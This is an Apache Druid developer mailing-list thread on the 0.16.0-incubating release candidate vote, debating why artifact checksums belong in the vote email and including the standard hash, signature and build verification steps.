Full checksum. An attacker can easily generate a binary that matches a given 32 bit bit (8 digit) hash. That’s why we use SHA-256 or SHA-512.
If it helps, here is a typical Calcite vote email: http://mail-archives.apache.org/mod_mbox/calcite-dev/201906.mbox/%3cCA+EpF8vwOceAeUjv+DJU=zqrkoqu3dwckwsypqhrj6crw9e...@mail.gmail.com%3e <http://mail-archives.apache.org/mod_mbox/calcite-dev/201906.mbox/%3CCA+EpF8vwOceAeUjv+DJU=zqrkoqu3dwckwsypqhrj6crw9e...@mail.gmail.com%3E> > On Sep 16, 2019, at 1:43 AM, Clint Wylie <cwy...@apache.org> wrote: > > Ah, oops, yes indeed they are reversed, my bad! I certainly agree with all > your points on why it is a good idea, and will update our template after > the release to make sure we do it in the future. Is it better practice to > include the full checksum, or would truncated to the first 8 or so > characters be preferable to play nice with email? > > On Sun, Sep 15, 2019 at 8:34 PM Julian Hyde <jh...@apache.org> wrote: > >> Sorry for my rather terse -1 vote. I had assumed that we had been >> following the policy for a while, so when I noticed that we were not I >> assumed it was a mistake by the release manager. >> >> Actually I am not sure whether it is policy, but there's definitely a >> strong case for including hashes. The point is this: we are voting on >> artifacts, principally apache-druid-0.16.0-incubating-src.tar.gz. >> >> Suppose we all vote on the current >> apache-druid-0.16.0-incubating-src.tar.gz, the vote passes, and then >> someone replaces it with a similar file that contains some bad stuff. >> How are we to know whether that is the file we voted on? >> >> Putting the file hash in the vote email guarantees that we are all >> voting on the same set of artifacts, and that set of artifacts is >> recorded. >> >> I think you reversed the hashes (I got 0c4b71f0 for bin, 1f25c55e for >> src), but that's close enough, so let's proceed. >> >> >> +1 (binding) >> >> Checked hashes, LICENSE, NOTICE, DISCLAIMER; ran RAT; compiled >> (skipping tests) using JDK 8 on Ubuntu. Checked that src.tar.gz >> matches git commit. >> >> Julian >> >> >> Julian >> >> On Sun, Sep 15, 2019 at 7:24 PM Clint Wylie <cwy...@apache.org> wrote: >>> >>>> The vote email must contain the checksums of the artifacts we are >> voting >>> on. >>> >>> Apologies, I wasn't aware of this requirement since we haven't put them >> in >>> our prior incubating release vote threads and I was just copying the same >>> basic template I and others have previously used. Out of curiosity is >> this >>> a new-ish requirement that I missed, or one we just didn't notice or have >>> just been turning a blind eye to? Regardless, since we are now >> maintaining >>> a 'how to ASF release' guide in the github repo that includes templates >> for >>> voting threads, >>> >> https://github.com/apache/incubator-druid/blob/master/distribution/asf-release-process-guide.md#body >> , >>> I'll >>> be sure to update it, thanks! >>> >>>> No need for a new RC; I change my vote if the release manager sends an >>>> email with the checksums. >>> >>> If this thread is ok, here they are: >>> >>> artifact checksums >>> src: >>> >> 0c4b71f077e28d2f4d3bc3f072543374570b98ec6a1918a5e1828e1da7e3871b5efb04070a8bcdbc172a817e43254640ce28a99757984be7d8dd3d607f1d870e >>> bin: >>> >> 1f25c55e83069cf7071a97c1e0d56732437dbac4ef373ed1ed72b5b618021b74c107269642226e80081354c8da2e92dc26f1541b01072a4720fd6cfe8dc161a8 >>> docker: df9b900d3726ce123a5c054768da1ea08eba6efe635ced5abc3ad72d6c835e2c >>> >>> Thanks! >>> Clint >>> >>> On Sun, Sep 15, 2019 at 6:22 PM Julian Hyde <jh...@apache.org> wrote: >>> >>>> -1 >>>> >>>> The vote email must contain the checksums of the artifacts we are >> voting >>>> on. >>>> >>>> No need for a new RC; I change my vote if the release manager sends an >>>> email with the checksums. >>>> >>>> Julian >>>> >>>> On Fri, Sep 13, 2019 at 11:57 PM Clint Wylie <cwy...@apache.org> >> wrote: >>>>> >>>>> Hi all, >>>>> >>>>> I have created a build for Apache Druid (incubating) 0.16.0, release >>>>> candidate 3. >>>>> >>>>> Thanks for everyone who has helped contribute to the release! You can >>>> read >>>>> the proposed release notes here: >>>>> https://github.com/apache/incubator-druid/issues/8369 >>>>> >>>>> The release candidate has been tagged in GitHub as >>>>> druid-0.16.0-incubating-rc3 >> (54d29e438a4df34d75e2385af6cefd1092c4ebb3), >>>>> available here: >>>>> >>>> >> https://github.com/apache/incubator-druid/releases/tag/druid-0.16.0-incubating-rc3 >>>>> >>>>> The artifacts to be voted on are located here: >>>>> >>>> >> https://dist.apache.org/repos/dist/dev/incubator/druid/0.16.0-incubating-rc3/ >>>>> >>>>> Staged druid.apache.org website documentation is available here: >>>>> >> https://druid.staged.apache.org/docs/0.16.0-incubating/design/index.html >>>>> >>>>> A Docker image containing the binary of the release candidate can be >>>>> retrieved via: >>>>> docker pull apache/incubator-druid:0.16.0-incubating-rc3 >>>>> >>>>> Release artifacts are signed with the following key: >>>>> https://people.apache.org/keys/committer/cwylie.asc >>>>> >>>>> This key and the key of other committers can also be found in the >>>> project's >>>>> KEYS file here: >>>>> https://dist.apache.org/repos/dist/release/incubator/druid/KEYS >>>>> >>>>> (If you are a committer, please feel free to add your own key to that >>>> file >>>>> by following the instructions in the file's header.) >>>>> >>>>> >>>>> Verify checksums: >>>>> diff <(shasum -a512 apache-druid-0.16.0-incubating-src.tar.gz | \ >>>>> cut -d ' ' -f1) \ >>>>> <(cat apache-druid-0.16.0-incubating-src.tar.gz.sha512 ; echo) >>>>> >>>>> diff <(shasum -a512 apache-druid-0.16.0-incubating-bin.tar.gz | \ >>>>> cut -d ' ' -f1) \ >>>>> <(cat apache-druid-0.16.0-incubating-bin.tar.gz.sha512 ; echo) >>>>> >>>>> Verify signatures: >>>>> gpg --verify apache-druid-0.16.0-incubating-src.tar.gz.asc \ >>>>> apache-druid-0.16.0-incubating-src.tar.gz >>>>> >>>>> gpg --verify apache-druid-0.16.0-incubating-bin.tar.gz.asc \ >>>>> apache-druid-0.16.0-incubating-bin.tar.gz >>>>> >>>>> Please review the proposed artifacts and vote. Note that Apache has >>>>> specific requirements that must be met before +1 binding votes can be >>>> cast >>>>> by PMC members. Please refer to the policy at >>>>> http://www.apache.org/legal/release-policy.html#policy for more >> details. >>>>> >>>>> As part of the validation process, the release artifacts can be >> generated >>>>> from source by running: >>>>> mvn clean install -Papache-release,dist -Dgpg.skip >>>>> >>>>> The RAT license check can be run from source by: >>>>> mvn apache-rat:check -Prat >>>>> >>>>> This vote will be open for at least 72 hours. The vote will pass if a >>>>> majority of at least three +1 PMC votes are cast. >>>>> >>>>> Once the vote has passed, the second stage vote will be called on the >>>>> Apache Incubator mailing list to get approval from the Incubator PMC. >>>>> >>>>> [ ] +1 Release this package as Apache Druid (incubating) 0.16.0 >>>>> [ ] 0 I don't feel strongly about it, but I'm okay with the release >>>>> [ ] -1 Do not release this package because... >>>>> >>>>> Thanks! >>>>> >>>>> Apache Druid (incubating) is an effort undergoing incubation at The >>>> Apache >>>>> Software Foundation (ASF), sponsored by the Apache Incubator. >> Incubation >>>> is >>>>> required of all newly accepted projects until a further review >> indicates >>>>> that the infrastructure, communications, and decision making process >> have >>>>> stabilized in a manner consistent with other successful ASF projects. >>>> While >>>>> incubation status is not necessarily a reflection of the >> completeness or >>>>> stability of the code, it does indicate that the project has yet to >> be >>>>> fully endorsed by the ASF. >>>> >>>> --------------------------------------------------------------------- >>>> To unsubscribe, e-mail: dev-unsubscr...@druid.apache.org >>>> For additional commands, e-mail: dev-h...@druid.apache.org >>>> >>>> >> >> --------------------------------------------------------------------- >> To unsubscribe, e-mail: dev-unsubscr...@druid.apache.org >> For additional commands, e-mail: dev-h...@druid.apache.org >> >>
